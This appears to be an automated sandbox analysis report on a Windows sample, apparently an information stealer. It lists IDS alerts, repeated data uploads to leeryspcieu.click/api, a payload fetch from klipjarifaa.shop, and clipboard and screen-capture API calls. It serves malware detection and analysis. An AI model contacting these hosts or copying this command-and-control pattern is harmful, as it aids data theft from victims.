                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49979 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49978 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 188.114.97.3:443 -> 192.168.2.5:49983
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: leeryspcieu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: leeryspcieu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TXBL6FP7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12776Host: leeryspcieu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RKU1FFS6PEEWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15042Host: leeryspcieu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0ADCPECMNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20514Host: leeryspcieu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C6D00O4HZE40U0P76User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1239Host: leeryspcieu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WEK41AY1KJLIER2YQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 577242Host: leeryspcieu.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: leeryspcieu.click
                  Source: global trafficHTTP traffic detected: GET /int_clp_8888.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipjarifaa.shop
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /int_clp_8888.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipjarifaa.shop
                  Source: global trafficDNS traffic detected: DNS query: leeryspcieu.click
                  Source: global trafficDNS traffic detected: DNS query: klipjarifaa.shop
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: leeryspcieu.click
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.securetrust.com/0?
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.trustwave.com/06
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0:
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3840091509.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA05
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3975919126.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0:
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3927008169.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3924090719.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3923676725.0000000003903000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937503296.0000000003907000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3928482811.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926046976.00000000039EF000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937004478.0000000003900000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921152302.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3923794882.00000000039D8000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3925160129.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921309363.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3937339896.0000000003B17000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926694212.000000000390A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926282396.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3924759593.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3938216484.0000000003906000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3926797756.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3927226610.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3921831161.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3931951681.0000000003A0A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3928316241.00000000039F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipjarifaa.shop/
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipjarifaa.shop/-9
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipjarifaa.shop/=9
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipjarifaa.shop/int_clp_8888.txt
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipjarifaa.shop/int_clp_8888.txt%
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3915518558.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipjarifaa.shop/int_clp_8888.txt0sA
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipjarifaa.shop/int_clp_8888.txth
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894355489.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3872774190.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3808879352.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826083750.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826098111.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826000118.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894355489.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leeryspcieu.click/
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915496518.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leeryspcieu.click/U9
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leeryspcieu.click/U:
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3894545007.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3916188240.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3877870850.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3808879352.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3827057780.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3839965568.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826083750.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915518558.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826127163.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3868587610.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3839865359.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3980750648.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826000118.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3839786304.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826704008.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leeryspcieu.click/api
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3868532626.0000000000DB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leeryspcieu.click/apiP
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3853254066.0000000003362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://leeryspcieu.click/apix
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3981124926.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3981628896.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3809622995.000000000339D000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809754010.000000000339A000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809680062.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3841042709.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49975 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49976 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49977 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49978 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49979 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49980 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49981 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49982 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49983 version: TLS 1.2
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C27A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_007C27A0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C27A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_007C27A0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C2950 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_007C2950

                  System Summary

                  barindex
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeWindow found: window name: AutoHotkey
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_00912A9F0_2_00912A9F
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_009186D00_2_009186D0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A60F80_2_007A60F8
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CE1100_2_007CE110
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_0079C9FC0_2_0079C9FC
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BC9810_2_007BC981
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C9A700_2_007C9A70
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007AFA000_2_007AFA00
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B3A000_2_007B3A00
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007BDAB40_2_007BDAB4
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C6B500_2_007C6B50
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_0079D3380_2_0079D338
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007B1BE00_2_007B1BE0
